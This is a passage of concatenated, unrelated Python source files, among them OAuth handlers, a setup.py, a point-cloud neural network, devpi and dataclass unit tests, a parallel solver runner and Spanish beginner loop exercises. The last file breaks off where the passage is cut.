next_url = base_authorized_signup_handler(resp, remote, *args, **kwargs)
# Redirect to next
if next_url:
return redirect(next_url)
return redirect(url_for('invenio_oauthclient_settings.index'))
@oauth_remote_error_handler
def disconnect_handler(remote, *args, **kwargs):
"""Handle unlinking of remote account.
This default handler will just delete the remote account link. You may
wish to extend this module to perform clean-up in the remote service
before removing the link (e.g. removing install webhooks).
:param remote: The remote application.
:returns: Redirect response.
"""
base_disconnect_handler(remote, *args, **kwargs)
return redirect(url_for('invenio_oauthclient_settings.index'))
@oauth_remote_error_handler
def signup_handler(remote, *args, **kwargs):
"""Handle extra signup information.
:param remote: The remote application.
:returns: Redirect response or the template rendered.
"""
try:
form = create_registrationform(request.form)
next_url = base_signup_handler(remote, form, *args, **kwargs)
if form.is_submitted():
if next_url:
return redirect(next_url)
else:
return redirect('/')
return render_template(
current_app.config['OAUTHCLIENT_SIGNUP_TEMPLATE'],
form=form,
remote=remote,
app_title=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
remote.name].get('title', ''),
app_description=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
remote.name].get('description', ''),
app_icon=current_app.config['OAUTHCLIENT_REMOTE_APPS'][
remote.name].get('icon', None),
)
except OAuthClientUnAuthorized:
# Redirect the user after registration (which doesn't include the
# activation), waiting for user to confirm his email.
return redirect(url_for('security.login'))
def oauth2_handle_error(remote, resp, error_code, error_uri,
error_description):
"""Handle errors during exchange of one-time code for an access tokens."""
flash(_('Authorization with remote service failed.'))
return redirect('/')
|
import os
import distutils.core
DEBUG_COMPILE_ARGS = None
VERSION = "0.0.1"
NAME = "bst"
DESCRIPTION = "Python binary search tree package written in C."
KEYWORDS = ["binary", "search", "tree", "C"]
if "DEBUG" in os.environ:
DEBUG_COMPILE_ARGS = ['-O0', '-g', '-pedantic-errors', '-Wall', '-Wextra', '-Wmissing-prototypes',
'-Wstrict-prototypes', '-Wold-style-definition']
distutils.core.setup(
name=NAME,
version=VERSION,
description=DESCRIPTION,
author="Warren Spencer",
author_email="warrenspencer27@gmail.com",
url="https://github.com/warrenspe/%s" % NAME,
download_url="https://github.com/warrenspe/%s/tarball/%s" % (NAME, VERSION),
keywords=KEYWORDS,
classifiers=[],
license="https://opensource.org/licenses/MIT",
platforms=["Linux", "Windows"],
ext_modules=[
distutils.core.Extension(
NAME,
sources = ['{0}/{0}.c'.format(NAME)],
include_dirs = [NAME],
extra_compile_args=DEBUG_COMPILE_ARGS
)
]
)
|
import torch
import torch.nn as nn
from lightconvpoint.nn import Convolution_ConvPoint as Conv
from lightconvpoint.nn import max_pool, interpolate
from lightconvpoint.spatial import knn, sampling_convpoint as sampling
class ConvPointNetwork(torch.nn.Module):
def __init__(self, in_channels, out_channels, segmentation=False, hidden=64):
super().__init__()
self.segmentation = segmentation
self.lcp_preprocess = True
if self.segmentation:
self.cv0 = Conv(in_channels, hidden, 16, bias=False,)
self.bn0 = nn.BatchNorm1d(hidden)
self.cv1 = Conv(hidden, hidden, 16, bias=False)
self.bn1 = nn.BatchNorm1d(hidden)
self.cv2 = Conv(hidden, hidden, 16, bias=False)
self.bn2 = nn.BatchNorm1d(hidden)
self.cv3 = Conv(hidden, hidden, 16, bias=False)
self.bn3 = nn.BatchNorm1d(hidden)
self.cv4 = Conv(hidden, 2*hidden, 16, bias=False)
self.bn4 = nn.BatchNorm1d(2*hidden)
self.cv5 = Conv(2*hidden, 2*hidden, 16, bias=False)
self.bn5 = nn.BatchNorm1d(2*hidden)
self.cv6 = Conv(2*hidden, 2*hidden, 16, bias=False)
self.bn6 = nn.BatchNorm1d(2*hidden)
self.cv5d = Conv(2*hidden, 2*hidden, 16, bias=False)
self.bn5d = nn.BatchNorm1d(2*hidden)
self.cv4d = Conv(4*hidden, 2*hidden, 16, bias=False)
self.bn4d = nn.BatchNorm1d(2*hidden)
self.cv3d = Conv(4*hidden, hidden, 16, bias=False)
self.bn3d = nn.BatchNorm1d(hidden)
self.cv2d = Conv(2*hidden, hidden, 16, bias=False)
self.bn2d = nn.BatchNorm1d(hidden)
self.cv1d = Conv(2*hidden, hidden, 16, bias=False)
self.bn1d = nn.BatchNorm1d(hidden)
self.cv0d = Conv(2*hidden, hidden, 16, bias=False)
self.bn0d = nn.BatchNorm1d(hidden)
self.fcout = nn.Conv1d(2*hidden, out_channels, 1)
else:
self.cv1 = Conv(in_channels, hidden, 16, bias=False, sampling=sampling)
self.bn1 = nn.BatchNorm1d(hidden)
self.cv2 = Conv(hidden, 2*hidden, 16, bias=False, sampling=sampling)
self.bn2 = nn.BatchNorm1d(2*hidden)
self.cv3 = Conv(2*hidden, 4*hidden, 16, bias=False, sampling=sampling)
self.bn3 = nn.BatchNorm1d(4*hidden)
self.cv4 = Conv(4*hidden, 4*hidden, 16, bias=False, sampling=sampling)
self.bn4 = nn.BatchNorm1d(4*hidden)
self.cv5 = Conv(4*hidden, 8*hidden, 16, bias=False, sampling=sampling)
self.bn5 = nn.BatchNorm1d(8*hidden)
self.fcout = nn.Linear(8*hidden, out_channels)
self.activation = nn.ReLU()
self.dropout = nn.Dropout(0.5)
def forward(self, x, pos, support_points=None, neighbors_indices=None):
if self.segmentation:
if support_points is not None:
support1, support2, support3, support4, support5, support6 = support_points
else:
support1, support2, support3, support4, support5, support6 = [None for _ in range(6)]
if neighbors_indices is not None:
ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = neighbors_indices
else:
ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = [None for _ in range(13)]
support1, _ = sampling(pos, 0.25, support1, None)
ids1 = knn(pos, support1, 16, ids1)
support2, _ = sampling(support1, 0.25, support2, None)
ids2 = knn(support1, support2, 16, ids2)
support3, _ = sampling(support2, 0.25, support3, None)
ids3 = knn(support2, support3, 16, ids3)
support4, _ = sampling(support3, 0.25, support4, None)
ids4 = knn(support3, support4, 16, ids4)
support5, _ = sampling(support4, 0.25, support5, None)
ids5 = knn(support4, support5, 16, ids5)
support6, _ = sampling(support5, 0.25, support6, None)
ids6 = knn(support5, support6, 16, ids6)
ids5d = knn(support6, support5, 4, ids5d)
ids4d = knn(support5, support4, 4, ids4d)
ids3d = knn(support4, support3, 4, ids3d)
ids2d = knn(support3, support2, 8, ids2d)
ids1d = knn(support2, support1, 8, ids1d)
ids0d = knn(support1, pos, 8, ids0d)
ids0 = knn(pos, pos, 16, ids0)
if x is not None:
x0 = self.activation(self.bn0(self.cv0(x, pos, pos, ids0)))
x1 = self.activation(self.bn1(self.cv1(x0, pos, support1, ids1)))
x2 = self.activation(self.bn2(self.cv2(x1, support1, support2, ids2)))
x3 = self.activation(self.bn3(self.cv3(x2, support2, support3, ids3)))
x4 = self.activation(self.bn4(self.cv4(x3, support3, support4, ids4)))
x5 = self.activation(self.bn5(self.cv5(x4, support4, support5, ids5)))
x6 = self.activation(self.bn6(self.cv6(x5, support5, support6, ids6)))
x = self.activation(self.bn5d(self.cv5d(x6, support6, support5, ids5d)))
x = torch.cat([x, x5], dim=1)
x = self.activation(self.bn4d(self.cv4d(x, support5, support4, ids4d)))
x = torch.cat([x, x4], dim=1)
x = self.activation(self.bn3d(self.cv3d(x, support4, support3, ids3d)))
x = torch.cat([x, x3], dim=1)
x = self.activation(self.bn2d(self.cv2d(x, support3, support2, ids2d)))
x = torch.cat([x, x2], dim=1)
x = self.activation(self.bn1d(self.cv1d(x, support2, support1, ids1d)))
x = torch.cat([x, x1], dim=1)
x = self.activation(self.bn0d(self.cv0d(x, support1, pos, ids0d)))
x = torch.cat([x, x0], dim=1)
x = self.dropout(x)
x = self.fcout(x)
return x, [support1, support2, support3, support4, support5, support6], [ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d]
else:
if support_points is not None:
support1, support2, support3, support4, support5 = support_points
else:
support1, support2, support3, support4, support5 = [None for _ in range(5)]
if neighbors_indices is not None:
ids1, ids2, ids3, ids4, ids5 = neighbors_indices
else:
ids1, ids2, ids3, ids4, ids5 = [None for _ in range(5)]
support1, _ = sampling(pos, 0.25, support1, None)
ids1 = knn(pos, support1, 16, ids1)
support2, _ = sampling(support1, 0.25, support2, None)
ids2 = knn(support1, support2, 16, ids2)
support3, _ = sampling(support2, 0.25, support3, None)
ids3 = knn(support2, support3, 16, ids3)
support4, _ = sampling(support3, 0.25, support4, None)
ids4 = knn(support3, support4, 16, ids4)
support5, _ = sampling(support4, 0.25, support5, None)
ids5 = knn(support4, support5, 16, ids5)
if x is not None:
x = self.activation(self.bn1(self.cv1(x, pos, support1, ids1)))
x = self.activation(self.bn2(self.cv2(x, support1, support2, ids2)))
x = self.activation(self.bn3(self.cv3(x, support2, support3, ids3)))
x = self.activation(self.bn4(self.cv4(x, support3, support4, ids4)))
x = self.activation(self.bn5(self.cv5(x, support4, support5, ids5)))
x = x.mean(dim=2)
x = self.dropout(x)
x = self.fcout(x)
return x, [support1, support2, support3, support4, support5], [ids1, ids2, ids3, ids4, ids5]
# def forward_without_features(self, pos, support_points=None, indices=None):
# if self.segmentation:
# _, _, ids0 = self.cv0(None, pos)
# _, support1, ids1 = self.cv1(None, pos)
# _, support2, ids2 = self.cv2(None, support1[0])
# _, support3, ids3 = self.cv3(None, support2[0])
# _, support4, ids4 = self.cv4(None, support3[0])
# _, support5, ids5 = self.cv5(None, support4[0])
# _, support6, ids6 = self.cv6(None, support5[0])
# _, _, ids5d = self.cv5d(None, support6[0], support5[0])
# _, _, ids4d = self.cv4d(None, support5[0], support4[0])
# _, _, ids3d = self.cv3d(None, support4[0], support3[0])
# _, _, ids2d = self.cv2d(None, support3[0], support2[0])
# _, _, ids1d = self.cv1d(None, support2[0], support1[0])
# _, _, ids0d = self.cv0d(None, support1[0], pos)
# support_points = support1 + support2 + support3 + support4 + support5 + support6
# indices = ids0 + ids1 + ids2 + ids3 + ids4 + ids5 + ids6 + ids5d + ids4d + ids3d + ids2d + ids1d + ids0d
# return None, support_points, indices
# else:
# _, support1, ids1 = self.cv1(None, pos)
# _, support2, ids2 = self.cv2(None, support1[0])
# _, support3, ids3 = self.cv3(None, support2[0])
# _, support4, ids4 = self.cv4(None, support3[0])
# _, support5, ids5 = self.cv5(None, support4[0])
# support_points = support1 + support2 + support3 + support4 + support5
# indices = ids1 + ids2 + ids3 + ids4 + ids5
# return None, support_points, indices
# def forward_with_features(self, x, pos, support_points=None, indices=None):
# if self.segmentation:
# ids0, ids1, ids2, ids3, ids4, ids5, ids6, ids5d, ids4d, ids3d, ids2d, ids1d, ids0d = indices
# support0, support1, support2, support3, support4, support5, support6 = support_points
# ids0 = knn(pos, pos, 16, ids0)
# x0 = self.activation(self.bn0(self.cv0(x, pos, support0, ids0)))
# x1 = self.activation(self.bn1(self.cv1(x0, support0, support1, ids1)))
# x2 = self.activation(self.bn2(self.cv2(x1, support1, support2, ids2)))
# x3 = self.activation(self.bn3(self.cv3(x2, support2, support3, ids3)))
# x4 = self.activation(self.bn4(self.cv4(x3, support3, support4, ids4)))
# x5 = self.activation(self.bn5(self.cv5(x4, support4, support5, ids5)))
# x6 = self.activation(self.bn6(self.cv6(x5, support5, support6, ids6)))
# x = self.activation(self.bn5d(self.cv5d(x6, support6, support5, ids5d)))
# x = torch.cat([x, x5], dim=1)
# x = self.activation(self.bn4d(self.cv4d(x, support5, support4, ids4d)))
# x = torch.cat([x, x4], dim=1)
# x = self.activation(self.bn3d(self.cv3d(x, support4, support3, ids3d)))
# x = torch.cat([x, x3], dim=1)
# x = self.activation(self.bn2d(self.cv2d(x, support3, support2, ids2d)))
# x = torch.cat([x, x2], dim=1)
# x = self.activation(self.bn1d(self.cv1d(x, support2, support1, ids1d)))
# x = torch.cat([x, x1], dim=1)
# x = self.activation(self.bn0d(self.cv0d(x, support1, support0, ids0d)))
# x = torch.cat([x, x0], dim=1)
# x = self.dropout(x)
# x = self.fcout(x)
# else:
# ids1, ids2, ids3, ids4, ids5 = indices
# support1, support2, support3, support4, support5 = support_points
# x = self.activation(self.bn1(self.cv1(x, pos, support1, ids1)))
# x = self.activation(self.bn2(self.cv2(x, support1, support2, ids2)))
# x = self.activation(self.bn3(self.cv3(x, support2, support3, ids3)))
# x = self.activation(self.bn4(self.cv4(x, support3, support4, ids4)))
# x = self.activation(self.bn5(self.cv5(x, support4, support5, ids5)))
# x = x.mean(dim=2)
# x = self.dropout(x)
# x = self.fcout(x)
# return x
|
import os
import sys
import json
import time
import unittest
import run_devpi
BASE_PATH = os.path.dirname(os.path.abspath(__name__))
# We use testpkg as a sample Python module to publish.
TEST_PACKAGE_PATH = os.path.join(BASE_PATH, 'testpkg')
class DevpiTestCase(unittest.TestCase):
basic_input = {
"workspace": {
"path": TEST_PACKAGE_PATH,
},
"vargs": {
"server": "http://localhost:3141/",
"index": "root/devpitest",
"username": "root",
"password": "",
}
}
# We'll override the default clientdir while creating our index below.
default_clientdir = '/tmp/devpi-testclientdir'
@classmethod
def setUpClass(cls):
# We'll only do this once so we're not hammering the server if we
# grow this test suite.
cls._wait_for_devpi_to_start(cls.basic_input, cls.default_clientdir)
def setUp(self):
self.old_argv_val = sys.argv
def tearDown(self):
sys.argv = self.old_argv_val
@classmethod
def _wait_for_devpi_to_start(cls, input_dict, clientdir):
"""
devpi is a bit... pokey while starting. We'll just harass it until
it responds before doing the rest of the tests.
"""
retries_left = 30
while retries_left > 0:
try:
run_devpi.select_server(
input_dict['vargs']['server'], clientdir=clientdir)
except SystemExit:
retries_left -= 1
time.sleep(1)
continue
return
def _ensure_test_index_exists(self, input_dict, clientdir):
"""
Since Drone fires up a new devpi server for each test run, we'll
need to create an index before we can upload.
"""
t_vargs = input_dict['vargs']
run_devpi.select_server(
t_vargs['server'], clientdir=clientdir)
run_devpi.login(
t_vargs['username'], t_vargs['password'],
clientdir=self.default_clientdir)
try:
run_devpi.create_index(
t_vargs['index'], clientdir=clientdir)
except SystemExit:
pass
def test_upload(self):
"""
Tests a simple package upload to an existing DevPi server.
"""
self._ensure_test_index_exists(
self.basic_input, self.default_clientdir)
sys.argv = ['--', json.dumps(self.basic_input)]
run_devpi.main()
class ValidationTestCase(unittest.TestCase):
def setUp(self):
self.basic_input = {
"workspace": {
"path": TEST_PACKAGE_PATH,
},
"vargs": {
"server": "http://localhost:3141/",
"index": "root/devpitest",
"username": "root",
"password": "",
}
}
def test_vargs_server_validation(self):
"""
Tests validation for vargs server keyword.
"""
vargs = self.basic_input.copy()['vargs']
# Start the party with something weird.
vargs['server'] = 'blah'
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
# Why not?
vargs['server'] = None
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
vargs['server'] = ''
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
# Protocol isn't included.
vargs['server'] = 'somehost.com/'
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
# Relative paths aren't useful.
vargs['server'] = '/somewhere'
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
# As if the user didn't pass it at all.
del vargs['server']
self.assertRaises(SystemExit, run_devpi.check_vargs, vargs)
# These should all be valid.
vargs['server'] = 'http://test.com/'
self.assertIsNone(run_devpi.check_vargs(vargs))
vargs['server'] = 'http://test.com/devpi/'
self.assertIsNone(run_devpi.check_vargs(vargs))
vargs['server'] = 'http://test.com:3141/'
self.assertIsNone(run_devpi.check_vargs(vargs))
if __name__ == '__main__':
unittest.main()
|
import tensorflow as tf
import numpy as np
class VariableData:
def __init__(self):
self.name = None
self.shape = None
self.values = None
class ModelLoader:
def __init__(self, folder_path):
"""
:param folder_path: string
"""
self.folder_path = folder_path
self._open_graph_def()
def create_feed_dict(self):
self.feed_dict = {}
for var in self._variables:
self.feed_dict[var.name+":0"] = var.values
def _open_graph_def(self):
self.graph_def = tf.GraphDef()
with open(self.folder_path + "graph.pb", "rb") as f:
self.graph_def.ParseFromString(f.read())
def create_variable_data(self, folder_path=None):
# variables - list of tuples (name, shape, values)
self._variables = []
if folder_path is None:
folder_path = self.folder_path
# states for reading file
eStart, eName, eShape, eValues = range(0, 4)
state = eName
with open(folder_path + "variables.dat") as f:
var_data = VariableData()
for line in f:
line = line.split()
if state == eStart:
var_data = VariableData()
state = eName
continue
elif state == eName:
var_data.name = line[0]
state = eShape
continue
elif state == eShape:
var_data.shape = tuple([int(x) for x in line])
state = eValues
continue
elif state == eValues:
var_data.values = np.array([float(x) for x in line])
var_data.values = var_data.values.reshape(var_data.shape)
self._variables.append(var_data)
state = eStart
continue
|
from __future__ import absolute_import, division, print_function
from stripe_modern.api_resources.abstract.api_resource import APIResource
from stripe_modern import api_requestor, util
class CreateableAPIResource(APIResource):
@classmethod
def create(
cls,
api_key=None,
idempotency_key=None,
stripe_version=None,
stripe_account=None,
**params
):
requestor = api_requestor.APIRequestor(
api_key, api_version=stripe_version, account=stripe_account
)
url = cls.class_url()
headers = util.populate_headers(idempotency_key)
response, api_key = requestor.request("post", url, params, headers)
return util.convert_to_stripe_object(
response, api_key, stripe_version, stripe_account
)
|
# from __future__ import annotations
import logging
import unittest
from dataclasses import dataclass, fields, Field, asdict, make_dataclass, \
_FIELDS
from pprint import pprint
from typing import List, Optional
from unittest import TestCase
from dacite import from_dict
from foxylib.tools.collections.collections_tool import smap
from future.utils import lmap
from foxylib.tools.dataclass.dataclass_tool import DataclassTool
from foxylib.tools.log.foxylib_logger import FoxylibLogger
class TestDataclassTool(TestCase):
@classmethod
def setUpClass(cls):
FoxylibLogger.attach_stderr2loggers(logging.DEBUG)
def test_01(self):
logger = FoxylibLogger.func_level2logger(self.test_01, logging.DEBUG)
@dataclass
class A:
x: int = None
y: str = None
a = A()
a.x = 1
self.assertEqual(a.x, 1)
DataclassTool.allfields2none(a)
self.assertIsNone(a.x,)
def test_02(self):
logger = FoxylibLogger.func_level2logger(self.test_02, logging.DEBUG)
@dataclass(frozen=True)
class A:
z: dict
x: int = None
y: str = None
a = from_dict(A, {'x': 1, 'z': {'a': 9}})
self.assertEqual(a, A(**{'x': 1, 'z': {'a': 9}}))
def test_03(self):
schema = [
('x', int,),
('y', [
('i', int,),
('j', str,),
]),
('z', str,),
]
A = DataclassTool.schema2dataclass_tree('A', schema)
dict_a = {'x': 1, 'y': {'i': 1, 'j': 'hello'}, 'z': 'bye'}
a = from_dict(A, dict_a)
self.assertEqual(asdict(a), dict_a)
dict_y = {'i': 9, 'j': 'oh'}
Y = DataclassTool.jpath2subdataclass(A, ['y'])
y = from_dict(Y, dict_y)
self.assertEqual(asdict(y), dict_y)
print({'a': a, 'y': y})
def test_04(self):
@dataclass(frozen=True)
class A:
x: int
y: make_dataclass("Y", [('i', int,), ('j', str,), ])
z: str
dict_a = {'x': 1, 'y': {'i': 1, 'j': 'hello'}, 'z': 'bye'}
a = from_dict(A, dict_a)
self.assertEqual(asdict(a), dict_a)
print({'a': a, })
def test_05(self):
logger = FoxylibLogger.func_level2logger(self.test_05, logging.DEBUG)
@dataclass(frozen=True)
class A:
x: int
y: str
self.assertEqual(DataclassTool.dataclass2fieldnames(A), {'x', 'y'})
self.assertEqual(
DataclassTool.json2filtered(A, {'x': 1, 'y': 'a', 'z': 'adsf'}),
{'x': 1, 'y': 'a', })
def test_06(self):
@dataclass(frozen=True)
class A:
x: int
self.assertEqual(DataclassTool.fieldname2checked(A, 'x'), 'x')
def test_07(self):
@dataclass(frozen=True)
class A:
x: int
self.assertTrue(DataclassTool.fieldname2is_valid(A, 'x'))
@unittest.skip(reason="can't make it work")
def test_08(self):
class A: pass
@dataclass(frozen=True)
class A:
x: int
a: Optional[A] = None
a = from_dict(A, {'x':3, 'a':{'x':4,}})
self.assertTrue(a.x, 3)
# self.assertTrue(a.a_list[0].x, 4)
# self.assertTrue(a.a_list[1].x, 5)
def test_09(self):
class A:
@dataclass(frozen=True)
class B:
y: str
@dataclass(frozen=True)
class A:
x: int
bs: List[A.B]
a = from_dict(A, {'x':3, 'bs':[{'y':'a'}, {'y':'b'}]})
self.assertTrue(a.x, 3)
self.assertTrue(a.bs[0].y, 'a')
self.assertTrue(a.bs[1].y, 'b')
def test_10(self):
class A:
@dataclass(frozen=True)
class B:
y: str
@dataclass(frozen=True)
class A:
x: int
bs: List[A.B]
a = from_dict(A, {'x': 3, 'bs': [{'y': 'a'}, {'y': 'b'}]})
a2 = DataclassTool.jpath2replaced(a, ['bs', 0, 'y'], 'c')
self.assertTrue(a2.bs[0].y, 'c')
b = from_dict(A, {'x': 3, 'bs': [{'y': 'a'}, {'y': 'b'}]})
b2 = DataclassTool.jpaths2replaced(b, [(['bs', 0, 'y'], 'p'), (['bs', 1, 'y'], 'q')])
self.assertTrue(b2.bs[0].y, 'p')
self.assertTrue(b2.bs[1].y, 'q')
|
#!/usr/bin/env python
import datetime
import math
import multiprocessing
import os
import shutil
import subprocess32 as subp
import sys
DATA = "data"
b = ""
trials = 1
timeout = None
register = None
def find_arg(argv, arg, offset=0):
for i, _arg in enumerate(argv):
if arg in _arg:
if arg == _arg: return argv[i+offset]
elif "=" in _arg: return _arg.split("=")[-1]
return None
def remove_arg(argv, arg):
_argv = []
for i in xrange(len(argv)):
_arg = argv[i]
if arg in _arg: continue
_argv.append(_arg)
return _argv
def repl_output_path(argv, path):
_argv = argv[:]
for i, arg in enumerate(argv):
if arg == "-o": _argv[i+1] = path
return _argv
def run(cmd, argv, seed):
_timeout = timeout * 60 if timeout > 0 else None
output_path = find_arg(argv, "-o", 1)
_argv = argv[:]
_argv.insert(0, str(seed))
_argv.insert(0, "--seed")
s_cmd = " ".join([cmd] + _argv)
degree = find_arg(argv, "-randdegree", 1)
output = os.path.join(DATA, "{}_single_{}_{}.txt".format(b, degree, str(seed)))
res = False
with open(output, 'w') as f:
f.write("[psketch] {}{}".format(s_cmd, os.linesep))
exit_code = -1
try:
exit_code = subp.check_call([cmd] + _argv, stdout=f, timeout=_timeout)
if exit_code == 0: res = True
except subp.CalledProcessError:
f.write("[psketch] maybe failed{}".format(os.linesep))
except subp.TimeoutExpired:
f.write("[psketch] timed out: {}{}".format(_timeout*1000, os.linesep))
f.write("[psketch] backend exit code: {}{}".format(exit_code, os.linesep))
if register and register == "True":
try:
_opts = []
_opts.extend(["-c", "register"])
_opts.extend(["-f", output])
_opts.extend(["-s"]) # single-threaded
_opts.extend(["-e", "11"])
#_opts.extend(["-v"])
subp.check_call(["./db.py"] + _opts)
except subp.CalledProcessError:
print "database registration failed", output
finally:
if os.path.exists(output):
os.remove(output)
return (output_path, res)
def p_run(cmd, argv):
output_path = find_arg(argv, "-o", 1)
n_cpu = multiprocessing.cpu_count()
pool = multiprocessing.Pool(max(1, int(n_cpu * 0.83)))
now = int(datetime.datetime.now().strftime("%H%M%S"))
seed = now * (10 ** int(math.log(trials, 10)))
def found( (fname, r) ):
if r: # found, copy that output file
shutil.copyfile(fname, output_path)
#pool.close()
#pool.terminate() # other running processes will become zombies here
results = []
temps = []
try:
for i in xrange(trials):
_output_path = output_path + str(i)
temps.append(_output_path)
_argv = repl_output_path(argv, _output_path)
r = pool.apply_async(run, (cmd, _argv, abs(seed+i)), callback=found)
results.append(r)
pool.close()
except KeyboardInterrupt:
pool.close()
pool.terminate()
except AssertionError: # apply_async is called after pool was terminated
pass
finally:
pool.join()
# clean up temporary files, while merging synthesis result
res = False
for i, fname in enumerate(temps):
try:
_fname, r = results[i].get(timeout=1) # very short timeout to kill zombies
res = res or r
assert fname == _fname
except IndexError:
pass # in case where temps.append happens but the loop finishes just before pool.apply_async
except multiprocessing.TimeoutError: # zombie case
pass
finally:
if os.path.exists(fname):
os.remove(fname)
return (output_path, res)
if __name__ == "__main__":
sketch_home = os.environ["SKETCH_HOME"]
if "runtime" in sketch_home: # using tar ball
sketch_root = os.path.join(sketch_home, "..", "..")
else: # from source
sketch_root = os.path.join(sketch_home, "..")
cegis = os.path.join(sketch_root, "sketch-backend", "src", "SketchSolver", "cegis")
argv = sys.argv[1:]
b = find_arg(argv, "-conc-benchmark")
trials = int(find_arg(argv, "-conc-repeat"))
timeout = int(find_arg(argv, "-conc-timeout"))
register = find_arg(argv, "-conc-register")
argv = remove_arg(argv, "-conc-benchmark")
argv = remove_arg(argv, "-conc-repeat")
argv = remove_arg(argv, "-conc-timeout")
argv = remove_arg(argv, "-conc-register")
_, res = p_run(cegis, argv)
if res: sys.exit(0)
else: sys.exit(1)
|
from plumbum.machines.local import LocalCommand, LocalMachine, local
from plumbum.machines.remote import BaseRemoteMachine, RemoteCommand
from plumbum.machines.ssh_machine import PuttyMachine, SshMachine
__all__ = (
"LocalCommand",
"LocalMachine",
"local",
"BaseRemoteMachine",
"RemoteCommand",
"PuttyMachine",
"SshMachine",
)
|
"""
testapp.tests.utils
Utility functions for assisting with unit tests.
"""
import os
import tempfile
from io import BytesIO
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfinterp import PDFPageInterpreter, PDFResourceManager
from pdfminer.pdfpage import PDFPage
def findChromePath():
"""
Check for a working path to a Google Chrome instance and return it. Raise Exception if none found.
Use this in all unit tests whenever a valid Chrome path instance is needed.
"""
chrome_paths = [
# Windows
r"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe",
# MacOS
r"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"
]
for p in chrome_paths:
if os.path.exists(p):
return p
raise RuntimeError('findChromePath() could not find a Google Chrome instance.')
def extractText(pdfbytes):
"""Use pdfminer to take a pdf file-like-object/stream and return its text as a str."""
fp = BytesIO(pdfbytes)
retstr = BytesIO()
laparams = LAParams()
rsrcmgr = PDFResourceManager()
device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=laparams)
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in PDFPage.get_pages(fp, caching=True, check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
device.close()
retstr.close()
if not isinstance(text, str):
text = text.decode('utf8')
return text
def createTempFile(file_bytes):
"""Create a temporary file with byte/str contents, and then close it."""
if isinstance(file_bytes, str):
file_bytes = file_bytes.encode('utf8')
temp = tempfile.NamedTemporaryFile(delete=False)
temp.write(file_bytes) # 10 bytes
temp.close() # close it, so it can be copied from for opens
return temp
|
def test_empty_object(worksheet):
ws = worksheet
sheet_items = ws.sheet_items
assert sheet_items == []
def test_parse_csv_header(worksheet):
ws = worksheet
path = "tests/inventory.csv"
csv_file = open(path, "r", encoding="utf-8-sig")
ws.csv_to_dict(csv_file=csv_file, delimiter=";")
ws_header = ws.header
assert "Bratislava" in str(ws_header)
assert "SK" in str(ws_header)
assert ws_header == {
"country": "SK",
"city": "Bratislava",
"citizens": "400000",
"": "11",
"random_field": "cc",
}
assert "" in ws_header
def test_parse_csv_all_items(worksheet):
ws = worksheet
path = "tests/inventory.csv"
csv_file = open(path, "r", encoding="utf-8-sig")
ws_items = ws.csv_to_dict(csv_file=csv_file, delimiter=";")
assert "Bratislava" in str(ws_items)
assert "Miami" in str(ws_items)
def test_parse_csv_sheet_items(worksheet):
ws = worksheet
path = "tests/inventory.csv"
csv_file = open(path, "r", encoding="utf-8-sig")
ws.csv_to_dict(csv_file=csv_file, delimiter=";")
ws_items = ws.sheet_items
assert "Bratislava" in str(ws_items)
assert "Miami" in str(ws_items)
assert '' in ws_items[0]
assert len(ws_items) > 1
assert len(ws_items) == 6
def test_sanitize_sheet_items(worksheet):
ws = worksheet
path = "tests/inventory.csv"
csv_file = open(path, "r", encoding="utf-8-sig")
ws.csv_to_dict(csv_file=csv_file, delimiter=";")
ws_items = ws.sanitize_sheet_items
assert "Bratislava" in str(ws_items)
assert "Miami" in str(ws_items)
assert "" not in ws_items[0]
|
'''
Created on 19/05/2012
@author: Willis Polanco
'''
def main():
# naturales()
# impares()
# pares()
# multiplo4()
# sumaReverso()
# suma()
# producto()
# capturaNumero()
# sumaParImpar()
# multiplo3()
calculoPotencia()
def naturales():
###Programa que imprima los 25 primeros numeros naturales
n = 1
while n <= 25:
print(n)
n += 1
def impares():
###Imprimir los numeros impares desde el 1 al 25, ambos inclusive
n = 1
h = ''
while n <= 25:
if n%2 != 0:
h += ' %i' % n
n += 1
print(h)
def pares():
###Imprimir los numeros pares desde el 40 hasta el 60, ambos inclusive
n = 40
h = ''
while n <= 60:
if n%2 == 0:
h += ' %i' % n
n += 1
print(h)
def multiplo4():
###Imprimir los numeros 48, 52, 56, ..., 120
n = 48
h = ''
while n <= 120:
h += ' %i' % n
n += 4
print(h)
def sumaReverso():
###Calcular e imprimir la suma 1+2+3+4+5+...+50
n = 100
h = ''
while n >= 20:
h += ' %i' % n
n -= 5
print(h)
def suma():
###Calcular e imprimir la suma 1+2+3+4+5+...+50
h = range(1, 51)
print(sum(h)) #con el comando sum se suma los numeros de una lista
def producto():
###Calcular e imprimir el producto 1*2*3*4*5*...*20
n = 1
h = 1
while n <= 20:
h *= n
n += 1
print(h)
def capturaNumero():
### Introducir un nuumero por teclado y decir si es par o impar
h = int(input('Introduzca un numero: '))
if h%2 == 0:
print('Este numero es par')
else:
print('Este numero es impar')
def sumaParImpar():
##Imprimir los numeros del 1 al 100 y calcular la suma de todos los nuumeros
###pares por un lado, y por otro, la de los impares.
n = 1
p = 0
i = 0
while n <= 100:
print(n)
if n%2 == 0:
p += n
else:
i += n
n += 1
print ('\nLa suma de los pares es igual a %i' % p)
print ('La suma de los impares es igual a %i' % i)
def multiplo3():
### Imprimir y contar los numeros multiplos de 3 que hay entre 1 y 100.
n = 1
h = 0
while n < 100:
if n%3 == 0:
print(n)
h += 1
n += 1
print ('\nEntre 1 y 100 hay %i numeros multiplos de 3' % h)
def calculoPotencia():
##Introducir dos valores A y B:
###Si A>=B, calcular e imprimir la suma 10+14+18+...+50
